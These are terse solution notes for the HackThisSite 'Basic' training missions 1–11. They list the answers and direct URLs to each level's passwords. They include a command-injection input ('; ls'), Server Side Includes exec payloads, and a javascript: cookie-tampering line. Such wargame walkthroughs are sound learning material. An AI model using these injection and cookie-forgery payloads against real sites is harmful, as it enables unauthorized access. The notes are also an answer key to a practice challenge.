Basic:

1) see HTML code

2) no password

3) https://www.hackthissite.org/missions/basic/3/password.php

4) change email in code

5) change email in code

6) ascii logic

1 2 3 4 5 6
1 3 5 7 9 11

def algo(string):
  string = list(string)
  print (string[0])
  for i in range(1, len(string)):
    print (chr(ord(string[i]) - i))

7) ; ls
   https://www.hackthissite.org/missions/basic/7/k1kh31b1n55h.php

8) Server Side Includes
  <!--#exec cmd="ls ../" -->
  https://www.hackthissite.org/missions/basic/8/au12ha39vc.php

9) (go to level 8)
    <!--#exec cmd="ls ../../9" -->
https://www.hackthissite.org/missions/basic/9/p91e283zc3.php

10) javascript:alert(document.cookie="level10_authorized=yes");
    or in developer console -> Storage -> Cookies -> Value of level10... = no

11) music of Elton John
    https://www.hackthissite.org/missions/basic/11/e
    https://www.hackthissite.org/missions/basic/11/e/l/t/o/n/.htaccess
    https://www.hackthissite.org/missions/basic/11/e/l/t/o/n/DaAnswer
    https://www.hackthissite.org/missions/basic/11/index.php